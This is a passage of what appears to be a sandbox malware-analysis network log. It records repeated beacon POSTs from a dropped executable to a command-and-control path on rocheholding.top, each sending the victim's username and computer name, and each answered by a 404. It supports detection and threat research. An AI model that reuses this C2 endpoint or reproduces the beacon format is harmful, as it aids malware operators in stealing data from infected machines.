                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:19:03.367819071 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:19:04.069135904 CEST625INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:19:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ejbrLZuj22CSU29KvxHGoP3%2BIH5mxtwOqh1ESVHkCIZmNpWcMxxa3TgvU%2FWq6OnjuGQqUzMxrH8ctJ5mK1bPvYDwlLekioEqhRp%2BitIzbKttCoyPVgjqtqL%2FovBkRsfVD3sH"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d547f0c8c2a-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      82192.168.2.2249246188.114.96.9803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:19:04.226887941 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:19:04.275613070 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:19:04.961457014 CEST627INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:19:04 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BRvjDfNJQ2cJf%2BT3f7P2r54lo3pPH52Sb%2FDuJ5xNz1f4iGHhoIVKcZ0R6i2xXIGhSq96IFGo4OWtUNRyy%2FwRc1E%2BJbe9ed0ZxjezMrFYrzRU4oXoOEYco%2B1QCt1D5gdjCplS"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d5a0be018b4-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      83192.168.2.2249247188.114.97.9803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:19:05.135746956 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:19:05.183686018 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:19:05.905803919 CEST627INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:19:05 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1fwyNVCBKJZ8KPcbWAVb3BOUyg7TiHG5aV6%2F80S3fWEl4iXn6%2F4T3k%2Fvp7zywd9bEdIrUrndsqb2MaSrLZ6T5XIhwRMctkj2UqzDk54qZHXD39zRSxKykeSGmUk%2FHrnPX2f%2B"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d5fed4917b5-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      84192.168.2.2249248188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:19:06.064260960 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:19:06.120733023 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:19:06.849389076 CEST625INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:19:06 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=02EWFTEVOVtWq0%2BgDUUMiV5Y1CdUN2v9OyKswqt957nxH%2FY02ewrJhb5sa5PR%2BQ0jlrgluETV%2B9BkRjKZyFPhcEImqcyqcu6amCR21waLTfLqXJTvXfQhkbG4RKWN8dIXqsT"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d65bc4b7cf0-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      85192.168.2.2249249188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:19:07.020534992 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:19:07.073698044 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:19:07.735543013 CEST627INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:19:07 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pblhBvhklB6b3N3x%2Bs3gf35fzVl2V1YgjxD318mrhyOlBf55l%2Fpj%2FxHCd3mDuZKenXm03EeZhQIMkotOjiVjY%2FKvDNRKhpaMdXmjP5sPb2nZ4NhzUu%2FC6ItME2vG6kAjgCwk"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d6b7981187d-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      86192.168.2.2249250188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:19:07.888746023 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:19:07.942332029 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:19:08.665510893 CEST633INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:19:08 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fkp7pT%2BacVPDlxbyDnc8SLigsJJV594c4bPNxwwTiAFccsngfJBdYYj1lZ9J%2F6XP1u%2BOG68axa7YRQy2d%2BDq%2Fe8mMZnuTF7nlde9fQw%2BuG9X4dPslkNDFJ4ON0DZGpQ%2F%2F4yz"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d712c360cac-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      87192.168.2.2249251188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:19:08.863871098 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:19:08.907586098 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:19:09.611733913 CEST629INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:19:09 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g4PDKzJMaa126SILTl9o053%2F1HYer3OQOJvXJB4DL67uxL3Pa%2Bl0tP0%2FdLdQ8%2FNvCWFQQA6hbeVozD%2BL1YzHzEdxeQT%2B9cIhLOOzwtVyLMuJoDtNvNIgBT7rsscPATB6KtvA"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d76f9c64308-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      88192.168.2.2249252188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:19:09.943896055 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:19:09.995471954 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:19:10.580454111 CEST617INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:19:10 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0GoTdgv9bDZbRWbGXDhVOa8gx6C1AwiFCghPTgmK3bLS58natdXAf4Pn2jX8HnthQQpdpr8fHCEnYNj8KzhotK7VgQJY7qRQFOJXVr2EmT8uR8NvGdWXtOEVcFcBkS4HZTww"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d7dca204204-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      89192.168.2.2249253188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:19:10.741295099 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:19:10.804636955 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:19:11.511003971 CEST623INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:19:11 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AhQLDiajpEIC9KtX%2F6HoVEYZTscS4kigoebrkrwjgPDuVwd5IrkLMyC%2B27Q7sFGJWDwIqOP7eintlnBUTvw12P%2Fzt0LL7fFhoaIadID6aoxzpsre9OFHkCTTHnSZ2QA76iom"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d82db9f0f36-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      90192.168.2.2249254188.114.96.9803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:19:11.675766945 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:19:11.727550030 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:19:12.451481104 CEST625INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:19:12 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VKNJmiDleFRWiJoza%2FFCTw4zc29t8azsk4PWe23kgI%2FwR6AFjYNTaMv9MQddllIKuUkJ7ltUjc%2FXV2Z4Nn0YLi5lrXFvvfm%2Bvvgko2kNV3gPlJcrVgxuQGeEfTWeVjHXtgNw"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d8879d772a1-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      91192.168.2.2249255188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:19:12.597934008 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:19:12.652106047 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:19:13.233325958 CEST629INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:19:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dSWxdqYs4qQ2zDwUAPEX6RazmvRs%2BDt1Xo%2FC3%2F1iC3QidnS4xfMAqb%2FG4PiXOC2BIa%2Bg5gjfn%2FCxpJvR1KkvNXFqoHCTuhk6hf3uMPTXR0XIHmIgUe0tww3UJNzojNrFtqU1"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d8e7f1d8c1e-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      92192.168.2.2249256188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:19:13.398916960 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:19:13.447422981 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:19:14.112435102 CEST629INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:19:14 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xce5oZfMpJRGsmJNSnq6%2B4TxB2N0J3wvjE9muGZwpfbM3EL9pNCBN1CfG5M9ubqlOTYkuK%2Bhw3e4jUen%2F%2FhbtfaiX6U%2FjJ5bS9p0hInJzIhX8p%2FFwNmPea2KuqqPjU1Ms8WV"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d934f7fc46d-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      93192.168.2.2249257188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:19:14.278026104 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:19:14.327351093 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:19:14.904860973 CEST627INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:19:14 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XDWKhb4y48HkO2eV477ic%2BPQ3TNoEdUAz%2FeyPDwYK9FFbqRb3o9wOfxBH587hBJpOswpKBZdrzXL%2FozFoAZfR8Vglx5X9xMNCnlmR6p8G4pUbd6Ed%2ByMdIxc2i%2FiGnYmwtnd"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d98dcbd43c2-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      94192.168.2.2249258188.114.96.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:19:15.184596062 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:19:15.236584902 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:19:15.842974901 CEST619INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:19:15 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i4A3w6EhOrGlHxkDf1fljwTAe9K1CA6Fj14fuL8t1bO4BuQ4CqRk1MbUBzYhjyJYaw6eEnMcfEiorIYXkSdNGwrl5UYfAmJ846yTzapNXLfC0VvoDW1cNkB%2FGI16Ell0Cxdd"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 88870d9ebf350f7d-EWR
                      alt-svc: h3=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      95192.168.2.2249259188.114.97.3803376C:\Users\user\AppData\Roaming\sharon38892.exe
                      TimestampBytes transferredDirectionData
                      May 23, 2024 20:19:16.005968094 CEST247OUTPOST /evie3/five/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: rocheholding.top
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: 21507074
                      Content-Length: 149
                      Connection: close
                      May 23, 2024 20:19:16.055433035 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                      Data Ascii: (ckav.ruAlbus141700ALBUS-PC0DE4229FCF97F5879F50F8FD3
                      May 23, 2024 20:19:16.725969076 CEST631INHTTP/1.1 404 Not Found
                      Date: Thu, 23 May 2024 18:19:16 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      X-Powered-By: PHP/5.4.16
                      Status: 404 Not Found
